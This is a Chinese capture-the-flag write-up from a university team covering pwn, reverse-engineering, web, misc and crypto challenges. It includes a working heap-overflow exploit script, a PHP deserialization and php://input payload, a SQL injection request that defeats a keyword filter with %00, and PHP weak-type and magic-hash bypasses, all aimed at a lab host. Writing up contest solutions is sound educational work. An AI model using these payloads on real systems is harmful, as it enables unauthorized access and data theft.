“黑盾杯”福州大學SIOR戰隊榮獲特等獎 重點題解題思路簡析
PWN
magicheap
程式給了一個cat flag
觸發條件隱藏的4869功能,當magic>0x1305時觸發讀flag
接下來就是想辦法讓magic>0x1305
漏洞點在edit函式中,編輯內容時候,size我們可以任意,但是堆塊的大小在creat的時候就已經固定,這裡的size能產生堆溢位
利用magic上面的stdin,是個0x7fXXXXXXXX的地址,把0x6020ad當成偽造堆塊
利用fsatbin的fd修改來實現將0x70大小的堆塊分配到在這裡
如果題目沒有給這麼個magic,沒有給libc,要去shell就沒這麼容易了
from pwn import * context.log_level = ‘debug’#p = process(‘./magicheap’)p = remote(‘192.168.200.200’,40001)def new(size,content): p.recvuntil(‘Your choice :’) p.sendline(‘1’) p.recvuntil(‘Heap : ‘) p.sendline(str(size)) p.recvuntil(‘heap:’) p.sendline(content) def edit(idx,size,content): p.recvuntil(‘Your choice :’) p.sendline(‘2’) p.recvuntil(‘Index :’) p.sendline(str(idx)) p.recvuntil(‘Heap : ‘) p.sendline(str(size)) p.recvuntil(‘heap : ‘) p.sendline(content)def free(idx): p.recvuntil(‘Your choice :’) p.sendline(‘3’) p.recvuntil(‘Index :’) p.sendline(str(idx)) new(0x60,’a’0x5f) new(0x60,’a’0x5f) new(0x60,’a’0x5f) new(0x60,’a’0x5f) new(0x60,’a’0x5f) new(0x60,’a’0x5f) free(1) free(2) edit(0,0x200,’a’0x60 + p64(0) + p64(0x71) + ‘a’0x60 + p64(0) + p64(0x71) + p64(0x6020ad)) new(0x60,’a’0x5f) new(0x60,’a’0x5f)#gdb.attach(p)p.interactive()
win逆向
簡單的讀取,比較
大概就是,你的輸入input,程式內建byte_415768,內建一個數組v9
前17有input[i] = byte_415768[v9[i]],再後面幾位是 1024} 就可以了
這個提取隨便寫下,但是當時沒注意這個17,v9陣列有22全提了再加 1024},後來隊友提醒。
WEB
theuserisadmin
原始碼
<!-- $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"];if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; include($file); //class.php}else{ echo "you are not admin ! "; } -->
通過php偽協議讀檔案
index.php <?php$user = $_GET[“user”]; $file = $_GET[“file”]; $pass = $_GET[“pass”];if(isset($user)&&(file_get_contents($user,’r’)===”the user is admin”)){ echo “hello admin!<br>“; if(preg_match(“/f1a9/“,$file)){ exit(); }else{ include($file); //class.php $pass = unserialize($pass); echo $pass; } }else{ echo “you are not admin ! “; }?><!-- $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"];if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; include($file); //class.php}else{ echo "you are not admin ! "; } --> class.php <?phpclass Read{//f1a9.php public $file; public function toString(){ if(isset($this->file)){ echo file_get_contents($this->file); } return “toString was called!”; } }?>
最後payload
POST /web/theuserisadmin/?user=php://input&file=class.php&pass=O%3A4%3A%22Read%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22f1a9.php%22%3B%7D HTTP/1.1 Host: 192.168.200.200 Content-Type: application/x-www-form-urlencoded Content-Length: 17 the user is admin
waf
掃描一波檔案 www.zip ok, 程式碼審計
function.php function filtering($str) { $check= eregi(‘select|insert|update|delete|’|/*|*|../|./|union|into|load_file|outfile’, $str); if($check) { echo “非法字元!”; exit(); } ….. }
eregi 使用 %00過掉
content.php 裡面直接拼接給的引數
<?phpinclude ‘./global.php’; extract($_REQUEST); $sql = “select * from test.content where id=$message_id”; payload POST /web/waf/content.php HTTP/1.1 Host: 192.168.200.200 Connection: close Content-Type: multipart/form-data; boundary=————2049511993 Content-Length: 138—————2049511993 Content-Disposition: form-data; name=”message_id””%00” union select 1,2,flag,4 from flag—————2049511993—
codeaudit
.svn 洩露
<?phperror_reporting(0); $user = $_COOKIE[‘user’]; $code = $_GET[‘code’]?(int)$_GET[‘code’]:’’;if($user == ‘admin’ && !empty($code)) { $hex = (int)$code; if(($hex ^ 6789) === 0xCDEF) {require("flag.php");echo $flag;exit(); } }echo “ȱ��Ӧ�еIJ���,��û��Ȩ�鿴������”;?>
很簡單
payload
GET /web/codeaudit/?code=55146 HTTP/1.1 Host: 192.168.200.200 Cookie: user=admin Connection: close
base lanauage
直接給原始碼
<?php showsource(_FILE); $a=0; $b=0; $c=0; $d=0; if (isset($_GET[‘x1’])) { $x1 = $_GET[‘x1’]; $x1==”1”?die(“ha?”):NULL; switch ($x1) { case 0: case 1: $a=1; break; } } $x2=(array)json_decode(@$_GET[‘x2’]); if(is_array($x2)){ is_numeric(@$x2[“x21”])?die(“ha?”):NULL; if(@$x2[“x21”]){ ($x2[“x21”]>2017)?$b=1:NULL; } if(is_array(@$x2[“x22”])){ if(count($x2[“x22”])!==2 OR !is_array($x2[“x22”][0])) die(“ha?”); $p = array_search(“XIPU”, $x2[“x22”]); $p===false?die(“ha?”):NULL; foreach($x2[“x22”] as $key=>$val){ $val===”XIPU”?die(“ha?”):NULL; } $c=1; } } $x3 = $_GET[‘x3’]; if ($x3 != ‘15562’) { if (strstr($x3, ‘XIPU’)) { if (substr(md5($x3),8,16) == substr(md5(‘15562’),8,16)) { $d=1; } } } if($a && $b && $c && $d){ include “flag.php”; echo $flag; } ?>
php 弱型別 和 array_search 比較的問題
下面的md5
$ php -R “echo substr(md5(‘15562’),8,16);”0e46379442318098
是0e[0-9] 在php中數字比較會變成0
所以找到另一個也是這樣的格式的md5串就好了
import hashlibimport re i = 0reg = re.compile(‘.{8}0e[0-9]{14}.{8}’)while True: s = ‘XIPU’ + str(i) md5 = hashlib.md5() md5.update(s.encode(‘ascii’)) if reg.match(md5.hexdigest()): print(md5.hexdigest(), s) break i = i + 1
payload
GET /web/bestlanguage/?x1=true&x2={“x21”:”2018a”,”x22”:[[],true]}&x3=XIPU18570 HTTP/1.1 Host: 192.168.200.200 Connection: close
MISC
reverseMe
開啟檔案發現有
swodniW( 6SC pohsotohP ebodA with open(‘reverseMe.txt’) as f: data = f.read() with open(‘output.png’, ‘wb’) as f: f.write(data[::-1])
得到這個圖片
流量審計
關鍵詞 theflag 二分法爆破
耐心一條一條分析就ok
52c6f1d6
crypto
brightstar
snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees
key: howarey
Columnar Transposition Cipher
提示 Columnar Transposition Cipher
key 和 ctf-wiki 裡面的例子一樣.直接手動解析
Itisofteninthedarkestskipsthatweseebrighteststars
這是啥呀
開啟 解base32
import base64>>> base64.b32decode(‘MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===’)b’flag{c8b558b954019856f0b02345dc39558c}’ >>>
注:解題報告由獲得特等獎的福州大學SIOR戰隊(指導老師:何蕭玲)提供
更多賽題解析,請關注我們後續報道~~~